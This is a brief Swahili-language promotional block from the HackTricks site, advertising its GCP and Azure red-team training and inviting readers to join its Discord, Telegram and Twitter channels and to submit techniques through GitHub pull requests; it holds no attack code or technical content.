Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

HackTricks